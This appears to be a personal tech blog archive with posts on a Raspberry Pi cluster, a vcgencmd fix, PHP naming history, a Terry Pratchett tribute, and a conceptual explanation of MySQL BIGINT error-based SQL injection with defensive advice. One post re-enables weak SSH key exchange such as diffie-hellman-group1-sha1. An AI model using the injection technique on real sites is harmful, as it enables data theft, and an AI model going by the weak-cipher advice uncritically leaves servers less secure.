Stacking multiple Raspberry Pi’s

For the Raspberry Pi cluster I wanted to make sure that they are neatly stored to keep them easy to reach.

Why nicely storing them is important

Each Raspberry Pi requires a power and network cable. When using a single raspberry pi the cables are not an issue but I am planning to use five as a baseline for my cluster. These cables can quickly start to become messy and make the cluster hard to reach.

Stacking the Raspberry Pi’s

Therefore I have selected a solution that would allow me to stack the Raspberry Pi’s on top of each other.

Image taken from aliexpress where I purchased the item from

This case allows excess heat to be vented through the sides which many case designs do not account for. Since I plan to be using the Pi’s extensively they will likely be running quite hot.

I plan to stack six raspberry Pi’s on top of each other so I have purchased three of these (two stacked) products.

VCHI initialization failed Raspberry Pi Fixed

vcgencmd get_mem arm VCHI initialization failed
Example showing VCHI initialization failed error

If when running vcgencmd on a raspberry pi you get VCHI initialization failed then you need to add the video group to your user. The vcgencmd tool requires you have this group role so without it, it will give VCHI initialization failed.

To add the user group to your user you can run:

sudo usermod -aG video <username>

Where <username> is the user you want to run the vcgencmd command with. This command adds the video group to the the user you specify.

Once you have ran the command any new logins will run the command successfully. Logging out and back into the pi will let you use the command.

Why this problem occurs

This issue happens when you try and use the vcgencmd command with a user that isn’t a member of the video group. This typically happens when you create a new user for the raspberry pi and don’t give it the same groups that the pi user has.

The solution above fixes this by adding the correct video group to the created user.

Building a Raspberry Pi cluster

dsc_0525Today’s blog marks the official start of my Raspberry Pi cluster project. Here I will be documenting the process of assembling, building, and running a small cluster. This blog will include both code snippets,  hardware diagrams and the results of various projects using the cluster.

Aims of the project

The Raspberry Pi cluster will be looking into distributed computing from both a hardware and software perspective. Some of the smaller projects planned include:

  • Youtube playlist syncing and download
  • Dynamic task management and distribution
  • MD5 hash calculators
  • Realtime Reddit thread analysis

But why a Raspberry Pi when it lacks power/ram/etc

Many of the tasks I am planning for the raspberry pi can be run faster and more easily on a single computer. My (5 year old) laptop will have more RAM and processing power than the initial cluster. If I was going for pure power I would run these tasks on a GPU. However the cluster is to experiment with the process of writing and working with a distributed environment.

Part of the reason why I have chosen a raspberry pi is that it is readily available, relatively cheap, and there is a lot of  support for it to run Linux. I am planning on running Raspbian Jessie PIXEL to begin with with the possibility of switching to full on Debian or Fedora later.

First steps to a Raspberry Pi Cluster

Already I have one Raspberry Pi 1 Model B Rev 2 which I am going to start developing software for while I collect the other parts. During this time I will search around for a number of raspberry Pi’s. My preference will be for the older versions so that I may purchase more of them cheaply.

Powering them is going to be an investigative point as I dont want to power them using multiple Raspberry Pi cables as these are costly in larger numbers and will occupy lots of power sockets.

As I am expecting to buy a couple different Raspberry Pi versions I am going to look for Micro SD cards which come with adapters. This is because Raspberry Pi 1 B models take a SD card and later models take a Micro SD card.

BIGINT Overflow Error Based SQL Injection

In MySQL 5.5+ you can abuse a new feature with BIGINT values. This involves a problem called integer rollover and your ability to run arbitrary SQL.

The problem of integer rollover

Integer rollover happens when a number is too big or small and is made bigger/smaller.

In the case where the number is the highest possible stored value adding to it makes it larger and it becomes as small as it can. Similarly when the number is too small and it has something subtracted from it it becomes very large.

This is down to how the number is represented in binary where it tries to make the value bigger/smaller and it “rolls over”. This is typically undesired behavior but in many languages this happens silently. Previously this was something you checked for manually however newer languages are starting to check and raise errors for this.

How MySQL is affected by this

Now in MySQL versions 5.5 or later instead of silently wrapping around it will raise an error and fail. This is considered better than silently making your number radically different.

 

If the website displays the mysql error directly, it will report back the result of the query that caused the rollaround. If a site incorrectly does this and allows unsanitized input to be sent to the database this allows you to craft a query and view the results.

By creating a subquery for the request and guessing table names you can pull out any data in the database. Worse is that this works for the information schema so you are able to get the data you need by querying this. Having full access to the database can mean that you can then download sensitive information.

Fixing this exploit

Here the exploit is stopped by properly escaping user input which is something that many websites still forget to do. In addition since this requires viewing the data in the returned error turning off error reporting would stop this bug, but not stop the ability to insert data via a subquery. Even in the case that the error is not shown back, being able to insert data may allow privilege escalation.

The full exploit including example code is available online and includes example code and the full explanation. This is another example of why is it critically important to sanitize input from users.

Mysql workbench working with key based exchange mechanisms

It appears newer linux sshd configs (fedora 22) by default include a smaller set of key exchange based mechanisms that they have turned on.

This means that it gives errors saying it is unable to connect to the server. To fix this you need to enable some of the older key exchange mechanisms,

Adding this line to /etc/ssh/sshd_config and restarting the sshd server will fix it

KexAlgorithms curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

Credits to: http://serverfault.com/questions/692060/mysql-workbench-with-debian-jessie-tcp-ip-over-ssh-does-not-work

Why are PHP’s function names a mess?

I have always wondered this, its exceptionally hit and miss and there isnt any real standards. I recently found the reason on the internet

Well, there were other factors in play there. htmlspecialchars was a very early function. Back when PHP had less than 100 functions and the function hashing mechanism was strlen(). In order to get a nice hash distribution of function names across the various function name lengths names were picked specifically to make them fit into a specific length bucket. This was circa late 1994 when PHP was a tool just for my own personal use and I wasn't too worried about not being able to remember the few function names.

-Rasmus - citation

So it turns out they were very specifically named to make sure they would fit nicely into the hashing function… Obviously today this isn’t needed, but its an exceptionally old artefact of PHP’s past that never got changed.

RIP Terry Pratchett – Long shall you live on in the Clacks

In one of his books:

The Hour of the Dead was when men died. And when a man died, they sent him home by clacks. Moist’s mouth dropped open. ‘Huh?’

‘That’s what they call it,’ said Harry. ‘Not lit’rally, o’ course. But they send his name from one end of the Trunk to the other, ending up at the tower nearest his home.’

‘Yeah, but they say sometimes the person stays on in the towers, somehow,’ said Jim.’ “Living in the Overhead”, they call it.’

Sir Terry will always live on in the overhead of reddit.

A lot of what travelled on the Grand Trunk was called the Overhead. It was instructions to towers, reports, messages about messages, even chatter between operators, although this was strictly forbidden these days. It was all in code. It was very rare you got Plain in the Overhead. But now . . . ‘There it goes again,’ she said. ‘It must be wrong. It’s got no origin code and no address. It’s Overhead, but it’s in Plain.’ On the other side of the tower, sitting in a seat facing the opposite direction because he was operating the up-line, was Roger, who was seventeen and already working for his tower-master certificate. His hand didn’t stop moving as he said: ‘What did it say?’

‘There was GNU, and I know that’s a code, and then just a name. It was John Dearheart. Was it a—’

‘You sent it on?’ said Grandad. Grandad had been hunched in the corner, repairing a shutter box in this cramped shed halfway up the tower. Grandad was the tower-master and had been everywhere and knew everything. Everyone called him Grandad. He was twenty-six. He was always doing something in the tower when she was working the line, even though there was always a boy in the other chair. She didn’t work out why until later. ‘Yes, because it was a G code,’ said Princess. ‘Then you did right. Don’t worry about it.’

‘Yes, but I’ve sent that name before. Several times. Upline and downline. Just a name, no message or anything!’ She had a sense that something was wrong, but she went on: ‘I know a U at the end means it has to be turned round at the end of the line, and an N means Not Logged.’ This was showing off, but she’d spent hours reading the cypher book. ‘So it’s just a name, going up and down all the time! Where’s the sense in that?’ Something was really wrong. Roger was still working his line, but he was staring ahead with a thunderous expression. Then Grandad said: ‘Very clever, Princess. You’re dead right.’

‘Hah!’ said Roger. ‘I’m sorry if I did something wrong,’ said the girl meekly. ‘I just thought it was strange. Who’s John Dearheart?’

‘He . . . fell off a tower,’ said Grandad. ‘Hah!’ said Roger, working his shutters as if he suddenly hated them. ‘He’s dead?’ said Princess. ‘Well, some people say—’ Roger began. ‘Roger!’ snapped Grandad. It sounded like a warning. ‘I know about Sending Home,’ said Princess. ‘And I know the souls of dead linesmen stay on the Trunk.’

‘Who told you that?’ said Grandad. Princess was bright enough to know that someone would get into trouble if she was too specific. ‘Oh, I just heard it,’ she said airily. ‘Somewhere.’

‘Someone was trying to scare you,’ said Grandad, looking at Roger’s reddening ears. It hadn’t sounded scary to Princess. If you had to be dead, it seemed a lot better to spend your time flying between the towers than lying underground. But she was bright enough, too, to know when to drop a subject. It was Grandad who spoke next, after a long pause broken only by the squeaking of the new shutter bars. When he did speak, it was as if something was on his mind. ‘We keep that name moving in the Overhead,’ he said, and it seemed to Princess that the wind in the shutter arrays above her blew more forlornly, and the everlasting clicking of the shutters grew more urgent. ‘He’d never have wanted to go home. He was a real linesman. His name is in the code, in the wind in the rigging and the shutters. Haven’t you ever heard the saying “A man’s not dead while his name is still spoken”?’

GNU Terry Pratchett

All webservers under my control return this header now, You can too with http://www.gnuterrypratchett.com/